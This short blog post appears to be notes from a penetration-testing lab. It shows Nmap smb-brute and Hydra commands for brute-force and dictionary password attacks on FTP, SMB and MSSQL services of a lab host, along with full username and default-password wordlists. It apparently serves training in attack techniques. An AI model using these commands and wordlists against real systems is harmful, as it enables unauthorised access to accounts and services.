Local Host: 131.107.1.222/24 (TEST-XP2)
Target Host: 131.107.1.101/24 (DEN-WEB1)
Brute Force Password Attack via SMB service
Z:\Tools\Nmap>nmap --script=smb-brute 131.107.1.101
Dictionary Password Attack via FTP, SMB and MSSQL service
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 ftp
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 smb
Z:\Tools\Hydra>hydra -L login.txt -P pass.txt 131.107.1.101 mssql
login.txt = contains user names
pass.txt = contains passwords
Contents of login.txt file:
admin
administrator
myadmin
sa
sysadmin
root
Contents of pass.txt file:
[blank]
admin
administrator
password
password123
P@ssw0rd
P@ssw0rd123
Pa$$w0rd
Pa$$w0rd123
sa
sysadmin
root
r00t
toor
t00r
No comments:
Post a Comment